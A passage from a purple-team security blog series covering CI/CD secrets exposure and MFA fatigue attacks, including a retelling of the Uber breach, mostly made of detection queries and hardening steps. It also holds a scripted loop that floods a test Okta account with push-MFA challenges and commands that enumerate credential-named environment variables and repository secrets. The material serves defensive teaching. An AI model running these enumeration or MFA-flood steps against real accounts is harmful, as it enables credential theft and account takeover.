# GitHub Actions: list secrets defined in a repository
# (shows names only — values are not returned by API, but names reveal what's stored)
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/actions/secrets" | \
  jq '.secrets[] | {name: .name, updated: .updated_at}'

# GitHub Actions: list organization-level secrets
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/orgs/your-org/actions/secrets" | \
  jq '.secrets[] | {name: .name, visibility: .visibility, updated: .updated_at}'

# Check for credentials in running pod environment variables (Kubernetes)
# This is what an attacker with kubectl exec access would do
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    .metadata.namespace + "/" + .metadata.name + ": " + 
    ([.spec.containers[].env[]? | 
      select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|API"; "i")) |
      .name
    ] | join(", "))' | \
  grep -v ": $"  # Only show pods with matching env var names

Testing Whether AWS Keys in CI/CD Are Over-Permissioned

# If you find an AWS access key in a scan — test its permissions
# (on your own test account's keys only)
aws sts get-caller-identity
# Returns: account, user/role ARN, caller ID

# What can this key do?
aws iam simulate-principal-policy \
  --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \
  --action-names "s3:*" "ec2:*" "iam:*" "sts:AssumeRole" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

Blue Phase: Detection Across the Secret Lifecycle

GitHub Secret Scanning Alerts

# List secret scanning alerts in a repository via GitHub API
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/secret-scanning/alerts?state=open" | \
  jq '.[] | {
    type: .secret_type,
    state: .state,
    created: .created_at,
    url: .html_url
  }'

CloudTrail: Detecting API Activity from CI/CD Credentials

When a CI/CD credential is used by an attacker, the CloudTrail events show unusual patterns:

# Find API calls from CI/CD credentials outside normal working hours
# or from unexpected IPs (attacker using the stolen key)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=ci-deploy-user \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,Name:EventName,IP:CloudTrailEvent}' \
  --output json | \
  jq '.[] | {
    time: .Time,
    event: .Name,
    ip: (.IP | fromjson | .sourceIPAddress),
    user_agent: (.IP | fromjson | .userAgent)
  }' | \
  jq 'select(.ip | test("^(10\\.|172\\.(1[6-9]|2[0-9]|3[01])\\.|192\\.168\\.)") | not)'
  # Filter: events from non-RFC1918 IPs (outside your known CI/CD IP ranges)

SIEM Query: Credential Used in Multiple Regions Simultaneously

A credential being used from multiple regions simultaneously is a strong indicator of compromise:

-- Athena query against CloudTrail logs
-- Detect: same access key used from multiple regions in same hour
SELECT
  userIdentity.accessKeyId,
  userIdentity.userName,
  COUNT(DISTINCT awsRegion) as region_count,
  ARRAY_AGG(DISTINCT awsRegion) as regions,
  COUNT(DISTINCT sourceIPAddress) as ip_count,
  ARRAY_AGG(DISTINCT sourceIPAddress) as source_ips,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime)) as hour
FROM cloudtrail_logs
WHERE
  userIdentity.type = 'IAMUser'
  AND from_iso8601_timestamp(eventTime) > current_timestamp - interval '7' day
GROUP BY
  userIdentity.accessKeyId,
  userIdentity.userName,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime))
HAVING COUNT(DISTINCT awsRegion) > 2
ORDER BY region_count DESC;

GuardDuty: Credential Exfiltration Indicators

# GuardDuty findings relevant to CI/CD credential compromise
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/TorIPCaller",
          "UnauthorizedAccess:IAMUser/MaliciousIPCaller",
          "Discovery:IAMUser/AnomalousBehavior",
          "Exfiltration:IAMUser/AnomalousBehavior",
          "CredentialAccess:IAMUser/AnomalousBehavior"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, user: .Resource.AccessKeyDetails.UserName, severity: .Severity}'

Purple Phase: The Structural Fix

Fix 1: OIDC Workload Identity — Eliminate Stored Credentials

This is the structural solution. Instead of storing an AWS IAM access key in your CI/CD platform, the CI/CD job authenticates to AWS using an OIDC token issued by the CI/CD provider. AWS validates the token against a pre-configured trust policy and issues temporary credentials valid for the duration of the job.

The OIDC workload identity approach eliminates static cloud access keys entirely — there is no secret to commit, no secret to exfiltrate from the CI/CD platform, and no long-lived credential to rotate on breach.

GitHub Actions with AWS OIDC — complete setup:

# .github/workflows/deploy.yml
name: Deploy to AWS

on:
  push:
    branches: [main]

permissions:
  id-token: write   # Required for OIDC token request
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github-actions-deploy-role
          role-session-name: github-actions-${{ github.run_id }}
          aws-region: us-east-1
          # No AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS_KEY needed

      - name: Deploy
        run: aws s3 sync ./dist s3://your-bucket/

AWS IAM trust policy for GitHub Actions OIDC:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        },
        "StringLike": {
          "token.actions.githubusercontent.com:sub": "repo:your-org/your-repo:ref:refs/heads/main"
        }
      }
    }
  ]
}

# Create the OIDC provider in AWS (one-time setup)
aws iam create-open-id-connect-provider \
  --url https://token.actions.githubusercontent.com \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "6938fd4d98bab03faadb97b34396831e3780aea1"

# Create the IAM role with the trust policy above
aws iam create-role \
  --role-name github-actions-deploy-role \
  --assume-role-policy-document file://github-actions-trust-policy.json

# Attach a least-privilege policy to the role
aws iam attach-role-policy \
  --role-name github-actions-deploy-role \
  --policy-arn arn:aws:iam::123456789012:policy/deploy-policy

Fix 2: Pre-Commit Hooks — Catch Accidents Before They Reach VCS

Pre-commit hooks don’t stop a determined attacker. They catch accidents — the developer who forgets to move a .env file to .gitignore before staging all files.

# Install pre-commit framework
pip install pre-commit

# .pre-commit-config.yaml in your repository root
cat > .pre-commit-config.yaml << 'EOF'
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.4
    hooks:
      - id: gitleaks
        name: Detect hardcoded secrets
        entry: gitleaks protect --staged --redact --verbose
        language: golang
        pass_filenames: false

  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.5.0
    hooks:
      - id: detect-private-key
      - id: check-added-large-files
        args: ['--maxkb=1000']
EOF

# Install the hooks in the local repository
pre-commit install

# Test against staged files
pre-commit run --all-files

Fix 3: CI-Layer Secret Scanning — Block Before Merge

# GitHub Actions: secret scanning as a required status check
# .github/workflows/secret-scan.yml
name: Secret Scan

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  secret-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0  # Full history for git log scanning

      - name: Run TruffleHog
        uses: trufflesecurity/trufflehog@main
        with:
          path: ./
          base: ${{ github.event.repository.default_branch }}
          head: HEAD
          extra_args: --only-verified --json

# GitLab CI: secret detection built-in template
include:
  - template: Security/Secret-Detection.gitlab-ci.yml

secret_detection:
  stage: test
  variables:
    SECRET_DETECTION_HISTORIC_SCAN: "true"  # Scan full history

Fix 4: Audit and Rotate Existing CI/CD Platform Secrets

After implementing OIDC, the migration path for existing stored credentials:

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Migration Audit
# Identifies AWS IAM keys stored in CI/CD that should be replaced with OIDC

echo "=== AWS IAM Keys Potentially Stored in CI/CD ==="
echo "--- Keys not used from expected CI/CD IPs in last 30 days ---"

# Get all IAM access keys
aws iam list-users --query 'Users[].UserName' --output text | tr '\t' '\n' | \
  while read user; do
    keys=$(aws iam list-access-keys --user-name "$user" \
      --query 'AccessKeyMetadata[?Status==`Active`].{Key:AccessKeyId,Created:CreateDate}' \
      --output json)

    if [ "$(echo "$keys" | jq length)" -gt 0 ]; then
      echo ""
      echo "User: $user"
      echo "$keys" | jq -r '.[] | "  Key: " + .Key + " | Created: " + .Created'

      # Check last used
      echo "$keys" | jq -r '.[].Key' | while read key_id; do
        last_used=$(aws iam get-access-key-last-used --access-key-id "$key_id" \
          --query 'AccessKeyLastUsed.{Date:LastUsedDate,Service:ServiceName,Region:Region}' \
          --output json)
        echo "  Last used: $(echo "$last_used" | jq -r '.Date // "Never"') | Service: $(echo "$last_used" | jq -r '.Service // "N/A"')"
      done
    fi
  done

echo ""
echo "=== MIGRATION CHECKLIST ==="
echo "  1. For each CI/CD IAM key above:"
echo "     a. Identify which CI/CD platform uses it"
echo "     b. Set up OIDC trust policy for that platform"
echo "     c. Update pipeline to use OIDC (no stored key)"
echo "     d. Disable and then delete the IAM key"
echo "     e. Verify pipelines still work"

Run This in Your Own Environment: Secrets Exposure Audit

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Exposure Audit
# Run from your workstation with git and trufflehog installed

echo "=== 1. Scan Local Repository for Committed Secrets ==="
if command -v trufflehog > /dev/null 2>&1; then
  trufflehog git file://$(pwd) --only-verified --json 2>/dev/null | \
    jq '{file: .SourceMetadata.Data.Git.file, detector: .DetectorName}' || \
    echo "  No verified secrets found in git history"
else
  echo "  Install trufflehog: pip install trufflehog3"
fi

echo ""
echo "=== 2. Check for .env Files in Git History ==="
git log --all --full-history -- "*.env" "**/.env" ".env.*" 2>/dev/null | \
  grep "^commit" | head -5 | \
  while read _ commit; do
    echo "  .env file committed: $commit"
    git show "$commit" --stat | head -3
  done

echo ""
echo "=== 3. Check Running Pods for Credential Env Vars (Kubernetes) ==="
if command -v kubectl > /dev/null 2>&1; then
  kubectl get pods -A -o json 2>/dev/null | \
    jq -r '.items[] | 
      .metadata.namespace + "/" + .metadata.name + ": " + 
      ([.spec.containers[].env[]? | 
        select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL"; "i")) |
        .name
      ] | join(", "))' | \
    grep -v ": $" | head -20
else
  echo "  kubectl not found"
fi

echo ""
echo "=== 4. GitHub Actions Secrets Inventory ==="
if [ -n "${GITHUB_TOKEN}" ]; then
  REPO="your-org/your-repo"  # Update this
  curl -s -H "Authorization: Bearer ${GITHUB_TOKEN}" \
    -H "Accept: application/vnd.github+json" \
    "https://api.github.com/repos/${REPO}/actions/secrets" | \
    jq '.secrets[] | {name: .name, updated: .updated_at}'
else
  echo "  Set GITHUB_TOKEN to enumerate repository secrets"
fi

⚠ Common Mistakes When Addressing CI/CD Secrets Exposure

Treating secret scanning as the primary control. TruffleHog and Gitleaks catch what gets committed. They do not prevent the CircleCI attack class — an attacker who compromises the CI/CD platform itself bypasses all scanning controls. Scanning is detection; OIDC workload identity is prevention.

Rotating compromised keys without checking CloudTrail for use. When a secret is exposed, the first question is not “rotate it” — it is “was it used?” Check CloudTrail for any API activity from the key between the suspected exposure time and the rotation. If the key was used, you have an active incident, not just a credential rotation task.

Using OIDC trust policies that are too broad. The GitHub Actions OIDC trust policy in the fix section uses a StringLike condition on the sub claim to scope to a specific repository and branch. If you use StringLike: "*" instead, any GitHub Actions job in any repository can assume your role. Always scope OIDC trust policies to the specific repository, branch, and environment that needs the access.

Not scanning git history — only the working tree. Secrets that were committed and then deleted are still in git history. git rm removes the file from the working tree but not from the object store. TruffleHog and Gitleaks scan history by default when given the --all flag. Scanning only the current working tree misses all historical exposures.

Forgetting third-party GitHub Actions. The supply chain attack surface includes the Actions you reference in your workflows. An Action pinned to a mutable tag (@main, @v1) can be changed by the maintainer. Pin to a specific commit SHA and verify the Action’s provenance.

# Vulnerable: mutable tag
- uses: aws-actions/configure-aws-credentials@v4

# Secure: pinned SHA
- uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e831c1e4c763fe4

Quick Reference

Secret Storage Pattern	Risk Level	Structural Fix
.env file committed to public repo	Critical	Pre-commit hook + OIDC
.env file committed to private repo	High	Git history purge + pre-commit hook + OIDC
Long-lived key in CI/CD env var	High	OIDC workload identity
Long-lived key in K8s Secret	High	Pod identity / IRSA / Workload Identity
Secret in build log output	Medium	Mask secrets in CI configuration
Secret in container env var	Medium	Vault agent / CSI secrets driver
Key referenced via AWS Secrets Manager	Low (if scoped)	Use for remaining static secrets

Key Takeaways

CI/CD secrets exposure is structural: long-lived credentials in a CI/CD platform are only as secure as that platform — the CircleCI breach proved that encryption alone is insufficient if the attacker can access the keys
Automated secret scanners find publicly committed credentials within 60–90 seconds — rotation must happen faster than that or assume compromise
Pre-commit hooks and CI secret scanning catch accidents; they do not prevent determined attackers who compromise the platform itself
OIDC workload identity is the structural fix: no stored credential means no credential to exfiltrate
When rotating a compromised key, check CloudTrail for usage between exposure and rotation before closing the incident
OIDC trust policies must be scoped to specific repositories and branches — a wildcard trust policy recreates the exposure in a different form
Pin third-party GitHub Actions to commit SHAs, not mutable tags — mutable tags are a supply chain attack surface

What’s Next

EP07 covers SSRF to cloud metadata: how an SSRF vulnerability in any application layer becomes a straight line to IAM credentials when IMDSv2 is not enforced. The Capital One breach anatomy — WAF SSRF → EC2 metadata → IAM role credentials → 100 million S3 records — in full technical detail, with the simulation commands and the one-line enforcement fix. If you’ve addressed identity and secrets, the network attack paths are where EP07 through EP10 focus.

Get EP07 in your inbox when it publishes → subscribe at linuxcent.com

MFA Fatigue Attacks: How Uber Got Breached and How to Stop It

June 10, 2026 by Vamshi Krishna Santhapuri

Reading Time: 10 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks

TL;DR

An MFA fatigue attack exploits push-notification MFA (Duo, Okta Verify, Microsoft Authenticator) by flooding a user with push requests until they accept one — either out of exhaustion or after social engineering
Uber (September 2022): contractor credentials purchased on a criminal marketplace → repeated Duo push notifications → WhatsApp social engineering → push accepted → admin PAM credentials found on internal file share → full access to AWS, GCP, Slack, HackerOne
The attack works because push MFA creates a UX habit: “tap accept” is a trained response, not a decision
Detection: multiple MFA failures followed by a single success in a short window — Okta System Log, Azure AD Sign-in Log, AWS CloudTrail
The structural fix is replacing push MFA with phishing-resistant FIDO2 hardware keys — not security awareness training, not more push notifications, not “number matching” alone
Okta (October 2023): support system breach exposed session tokens → attackers bypassed MFA entirely by using stolen session context

OWASP Mapping: A07 Identification and Authentication Failures. The Uber breach is the defining infrastructure example. Okta demonstrates session token theft as a related A07 variant.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                    MFA FATIGUE ATTACK ANATOMY                       │
│                                                                     │
│   STEP 1: OBTAIN CREDENTIALS                                        │
│   Attacker ──── phish / buy on market ──────▶ username + password  │
│                                                                     │
│   STEP 2: TRIGGER MFA FLOOD                                         │
│   Attacker ──── repeated login attempts ────▶ Push #1 → User: NO   │
│                                               Push #2 → User: NO   │
│                                               Push #3 → User: NO   │
│                                               Push #4 → User: ???   │
│                                                                     │
│   STEP 3: SOCIAL ENGINEERING LAYER                                  │
│   Attacker ──── "Hi, I'm from IT support.                           │
│                  Please accept the next push."                      │
│                                               Push #4 → User: YES  │
│                                                                     │
│   STEP 4: ACCESS                                                    │
│   Attacker ──── authenticated session ──────▶ Internal network      │
│                                               Enumerate shares      │
│                                               Find next credential  │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   WHY TRAINING DOESN'T HELP:                                        │
│   Push MFA trains users to tap accept. The attacker exploits        │
│   the trained behavior. Education competes with habit.              │
│                                                                     │
│   WHY HARDWARE KEYS DO:                                             │
│   FIDO2 requires physical presence. WhatsApp message                │
│   cannot accept a hardware key challenge.                           │
└─────────────────────────────────────────────────────────────────────┘

An MFA fatigue attack is how you bypass multi-factor authentication without breaking encryption or stealing the MFA seed — you exploit the user’s psychology and the UX of push-notification systems. The attacker knows the password. The only thing standing between them and access is the user’s willingness to tap “deny” indefinitely.

The Uber Breach: Anatomy Minute by Minute

September 15, 2022. The attacker’s capabilities: a purchased credential set for an Uber contractor account, a phone number, and patience.

The credential acquisition: Uber contractor credentials were available on criminal marketplaces. The attacker obtained a valid username and password for an Uber contractor’s Uber corporate account.

The MFA flood:

The contractor’s account had Duo push-based MFA enrolled. The attacker initiated login attempts repeatedly, triggering a sequence of Duo push notifications to the contractor’s phone. The contractor rejected three or four of them. At this point, most attacks would stop — but the attacker added a social engineering layer.

The WhatsApp message:

The attacker sent a WhatsApp message to the contractor’s number, claiming to be from Uber IT support:

“Hi, this is the Uber IT support team. We’re seeing some issues with your account and need you to approve the next Duo notification to verify your identity.”

The contractor accepted the next push notification.

Post-authentication enumeration:

With an authenticated session, the attacker accessed Uber’s internal network. On an internal network share accessible to contractors, they found a PowerShell script. In that script: hardcoded Thycotic admin credentials. Thycotic is a Privileged Access Management (PAM) system — it stores credentials for privileged accounts across an organization.

The blast radius:

With Thycotic admin access, the attacker retrieved credentials for:
– AWS IAM accounts
– GCP service accounts
– Google Workspace admin
– VMware vSphere
– Slack workspace admin
– HackerOne bug bounty program admin (including details of open security reports)

The entire Uber infrastructure was accessible from one contractor’s push notification acceptance.

What Uber’s logs showed:

2022-09-15T02:17:00Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:17:45Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:18:30Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:19:15Z  [Duo] [email protected]  action=push_sent  result=rejected
2022-09-15T02:22:00Z  [Duo] [email protected]  action=push_sent  result=approved
2022-09-15T02:22:05Z  [VPN] [email protected]  connection=established  ip=<attacker>

Four rejections followed by one approval in a five-minute window. This is a detectable pattern — but only if someone is looking for it.

Red Phase: Simulating MFA Fatigue

What the Attack Looks Like in Tooling

MFA fatigue attacks are conducted manually — an attacker with valid credentials and knowledge of which MFA system the target uses. No special tooling is required for the attack itself. What can be simulated:

Option 1: Repeated legitimate login attempts (test account only)

# DO NOT run against production accounts or accounts you don't own

# Using Okta API to authenticate (test environment only)
TEST_USERNAME="[email protected]"
TEST_PASSWORD="TestPassword123!"
OKTA_DOMAIN="your-org.okta.com"

for i in {1..5}; do
  echo "Attempt $i at $(date +%T)"
  response=$(curl -s -X POST \
    "https://${OKTA_DOMAIN}/api/v1/authn" \
    -H "Content-Type: application/json" \
    -d "{\"username\": \"${TEST_USERNAME}\", \"password\": \"${TEST_PASSWORD}\"}")

  status=$(echo "$response" | jq -r '.status')
  echo "  Status: $status"

  if [ "$status" = "MFA_CHALLENGE" ]; then
    state_token=$(echo "$response" | jq -r '.stateToken')
    factor_id=$(echo "$response" | jq -r '._embedded.factors[] | select(.factorType == "push") | .id')
    echo "  Factor ID: $factor_id (push notification triggered)"

    # In a real attack, the attacker would poll for the MFA response:
    echo "  Waiting 10 seconds for user to respond..."
    sleep 10
  fi

  sleep 30  # Wait between attempts to avoid rate limiting
done

Option 2: Tabletop exercise (no credentials required)

For organizations that cannot run live credential tests, the tabletop simulation maps the attack against your specific IdP logs. Pull 30 days of authentication logs and look for the pattern:

# Okta System Log: find users with multiple MFA failures followed by success
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"&limit=1000" | \
  jq '
    group_by(.actor.id) |
    map({
      user: .[0].actor.displayName,
      total: length,
      failures: [.[] | select(.outcome.result == "FAILURE")] | length,
      successes: [.[] | select(.outcome.result == "SUCCESS")] | length
    }) |
    sort_by(.failures) |
    reverse |
    .[0:20]
  '

Users with high failure counts followed by eventual success are the fatigue attack pattern. Some will be legitimate (user locked themselves out, then called IT). The ones to investigate are those where the failure-to-success sequence happened in a short window (under 30 minutes) and from an unusual IP.

Blue Phase: Detection Across Identity Providers

Okta: Push Notification Flood

# Okta System Log — detect repeated push failures from same user
# Query for: >3 push failures within 10 minutes for same user
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"+and+outcome.result+eq+\"FAILURE\"&since=$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)" | \
  jq '
    group_by(.actor.id, (.published[0:16])) |
    map(select(length >= 3)) |
    map({
      user: .[0].actor.displayName,
      window: .[0].published[0:16],
      failure_count: length,
      ips: [.[].client.ipAddress] | unique
    })
  '

Azure AD: Conditional Access Logs

# Azure AD: MFA push denial flood detection (using Azure CLI)
az monitor activity-log list \
  --start-time "$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)" \
  --query "[?contains(operationName.value, 'MFA')].{user:caller,time:eventTimestamp,result:status.value}" \
  --output table

In Microsoft Sentinel, the detection rule for MFA fatigue:

// Azure AD MFA Fatigue Detection — Sentinel KQL
SigninLogs
| where TimeGenerated > ago(24h)
| where AuthenticationRequirement == "multiFactorAuthentication"
| where ResultType != "0"  // Non-success
| summarize
    FailureCount = count(),
    SuccessCount = countif(ResultType == "0"),
    IPs = make_set(IPAddress),
    StartTime = min(TimeGenerated),
    EndTime = max(TimeGenerated)
    by UserPrincipalName, bin(TimeGenerated, 10m)
| where FailureCount >= 3
| where SuccessCount >= 1
| where datetime_diff('minute', EndTime, StartTime) <= 30
| project UserPrincipalName, FailureCount, SuccessCount, IPs, StartTime, EndTime
| order by FailureCount desc

AWS CloudTrail: Console Session After MFA Flood

If your organization uses AWS SSO (IAM Identity Center) with an external IdP, the CloudTrail event that matters is the console login event immediately following the MFA success:

# Find AWS console login events from unusual IPs
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,User:Username,IP:CloudTrailEvent}' \
  --output json | \
  jq '.[] | {
    time: .Time,
    user: .User,
    ip: (.IP | fromjson | .sourceIPAddress),
    mfa: (.IP | fromjson | .additionalEventData.MFAUsed)
  }'

What a GuardDuty Alert Looks Like for This Attack

GuardDuty does not generate a specific finding for MFA fatigue (it does not have visibility into IdP logs). What it may catch downstream:

UnauthorizedAccess:IAMUser/ConsoleLoginSuccess.B — console login from unusual geographic location or Tor exit node
Discovery:IAMUser/AnomalousBehavior — if the attacker begins enumerating IAM after console access

The gap: GuardDuty’s behavioral analysis is per-account. If the attacker logs in using valid credentials and MFA, GuardDuty may not flag the initial access — only downstream actions that deviate from baseline.

Purple Phase: The Structural Fix

Fix 1: Replace Push MFA with FIDO2 Hardware Keys (for Tier-0 Accounts)

This is the only structural fix. MFA fatigue attacks work because push notifications can be approved by a human who is socially engineered. FIDO2 hardware keys (YubiKey, Google Titan, etc.) require physical possession of the key and a user gesture (touch). A WhatsApp message cannot substitute for physical key presence.

# Okta: Require hardware key MFA for admin accounts
# (done via Okta Admin Console → Security → Authentication Policies)
# CLI example using Okta API:

# Create a new authentication policy requiring hardware authenticator
curl -X POST \
  "https://your-org.okta.com/api/v1/policies" \
  -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Admin Hardware Key Policy",
    "type": "ACCESS_POLICY",
    "status": "ACTIVE",
    "description": "Requires FIDO2 hardware key for admin access"
  }'

Phasing hardware keys across an organization:

Tier	Examples	Timeline
Tier 0 — immediate	Cloud admin, IAM admin, Okta admin, DNS admin	Week 1
Tier 1 — 30 days	All engineers with production access	Month 1
Tier 2 — 90 days	All employees with SSO access	Month 3
Contractors	Scope-limited access, enforce at boundary	Immediate

Fix 2: Number Matching (Intermediate Mitigation)

If hardware keys cannot be deployed immediately, number matching significantly reduces MFA fatigue effectiveness. Instead of a simple “approve/deny” push, the user must match a number shown on the login screen to a number shown in the authenticator app. This breaks the fatigue pattern — the attacker cannot trigger an approval without the user actively entering the correct number.

# Duo: Enable number matching
# Duo Admin Console → Policies → Duo Push Number Matching: Required

# Microsoft Authenticator: Enable number matching
# Azure AD → Security → Authentication methods → Microsoft Authenticator
# Enable: "Require number matching for push notifications"

# Okta Verify: Enable TOTP-bound push
# Okta Admin → Security → Multifactor → Okta Verify → Enable "Number Challenge"

Fix 3: Detect and Block — Automated Response to Fatigue Pattern

#!/usr/bin/env python3
# Purple Team EP05 — MFA Fatigue Auto-Response
# Monitors Okta System Log; suspends user on fatigue pattern detection
# Run as a Lambda function or scheduled script in your SIEM pipeline

import boto3
import requests
import json
from datetime import datetime, timedelta

OKTA_DOMAIN = "your-org.okta.com"
OKTA_TOKEN = "your-okta-api-token"  # use Secrets Manager in production
SNS_TOPIC_ARN = "arn:aws:sns:us-east-1:123456789012:security-alerts"

def get_recent_mfa_events(hours=1):
    since = (datetime.utcnow() - timedelta(hours=hours)).strftime("%Y-%m-%dT%H:%M:%SZ")
    url = f"https://{OKTA_DOMAIN}/api/v1/logs"
    params = {
        "filter": 'eventType eq "user.authentication.auth_via_mfa"',
        "since": since,
        "limit": 1000
    }
    headers = {"Authorization": f"SSWS {OKTA_TOKEN}"}
    response = requests.get(url, params=params, headers=headers)
    return response.json()

def detect_fatigue_pattern(events, failure_threshold=3, window_minutes=10):
    user_events = {}
    for event in events:
        user_id = event["actor"]["id"]
        user_name = event["actor"]["displayName"]
        result = event["outcome"]["result"]
        timestamp = event["published"]

        if user_id not in user_events:
            user_events[user_id] = {"name": user_name, "events": []}
        user_events[user_id]["events"].append({"result": result, "time": timestamp})

    fatigue_users = []
    for user_id, data in user_events.items():
        events_sorted = sorted(data["events"], key=lambda x: x["time"])
        failures = [e for e in events_sorted if e["result"] == "FAILURE"]

        if len(failures) >= failure_threshold:
            # Check if a success followed the failures
            last_failure_time = failures[-1]["time"]
            successes_after = [
                e for e in events_sorted
                if e["result"] == "SUCCESS" and e["time"] > last_failure_time
            ]
            if successes_after:
                fatigue_users.append({
                    "user_id": user_id,
                    "user_name": data["name"],
                    "failure_count": len(failures),
                    "success_after_failures": True
                })

    return fatigue_users

def alert_security_team(fatigue_users):
    sns = boto3.client("sns")
    message = f"MFA FATIGUE ALERT — {len(fatigue_users)} user(s) detected:\n"
    for user in fatigue_users:
        message += f"  - {user['user_name']}: {user['failure_count']} failures then success\n"

    sns.publish(
        TopicArn=SNS_TOPIC_ARN,
        Subject="Purple Team: MFA Fatigue Attack Detected",
        Message=message
    )

def lambda_handler(event, context):
    events = get_recent_mfa_events(hours=1)
    fatigue_users = detect_fatigue_pattern(events)
    if fatigue_users:
        alert_security_team(fatigue_users)
    return {"fatigue_users_detected": len(fatigue_users)}

Fix 4: Privileged Access Workstations and Session Recording

The Uber breach succeeded because the attacker found hardcoded credentials on a file share accessible to contractors. The downstream fix after identity:

# Ensure no scripts or configuration files contain credentials
# Run TruffleHog against your internal repositories and file shares
trufflehog filesystem /path/to/internal/share \
  --json \
  --include-detectors=all \
  2>/dev/null | \
  jq '{file: .SourceMetadata.Data.Filesystem.file, detector: .DetectorName, verified: .Verified}'

Run This in Your Own Environment: MFA Audit

#!/bin/bash
# Purple Team EP05 — MFA Coverage Audit
# Checks for push-MFA users who are A07 exposure without hardware key enrollment

echo "=== AWS: Console Users Without MFA ==="
aws iam generate-credential-report > /dev/null 2>&1
sleep 5
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {
    print "  USER: " $1 " | Console: " $4 " | MFA: " $8
  }'

echo ""
echo "=== AWS: IAM Users with Long-Lived Access Keys (rotation risk) ==="
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $9!="N/A" {
    cmd = "date -d " $10 " +%s"
    cmd | getline key_date; close(cmd)
    now = systime()
    age_days = int((now - key_date) / 86400)
    if (age_days > 90) print "  USER: " $1 " | KEY AGE: " age_days " days"
  }'

echo ""
echo "=== RECOMMENDATION ==="
echo "  - Any console user without MFA = immediate A07 exposure"
echo "  - For accounts with Okta/Azure AD: run IdP-specific audit above"
echo "  - Hardware FIDO2 keys required for all admin accounts"

⚠ Common Mistakes When Responding to MFA Fatigue Risk

Mandating security training as the primary response. The Uber contractor was experienced. Training did not fail — the attacker exploited a social engineering vector that training cannot structurally prevent. Hardware keys remove the social engineering surface entirely.

Implementing “number matching” and considering MFA fatigue solved. Number matching makes fatigue attacks harder, not impossible. A sophisticated attacker can relay the number in real time via voice call (“what number do you see on your screen?”). It buys time; it does not eliminate the attack class.

Requiring MFA for employees but not contractors. The Uber breach was a contractor account. Contractor access policies tend to have looser MFA requirements because contractors often resist corporate MDM on personal devices. The solution is to scope contractor access tightly and require hardware key MFA at the access boundary, not push MFA.

Not monitoring for the failure-then-success pattern. The Okta System Log, Azure AD Sign-in Logs, and Duo Admin Panel all have the data to detect MFA fatigue in real time. Most organizations generate these logs but do not have detection rules for the pattern. The detection is straightforward; the investment is adding the rule to your SIEM.

Forgetting session tokens. The Okta breach was not MFA fatigue — it was session token theft. An attacker who can steal a valid session token does not need to beat MFA at all. Session token lifetime, storage security, and re-authentication requirements for sensitive operations are separate controls that address this variant.

Quick Reference

Attack Variant	Mechanism	Structural Fix
Push notification flood	Attacker initiates logins repeatedly until user accepts	FIDO2 hardware key MFA
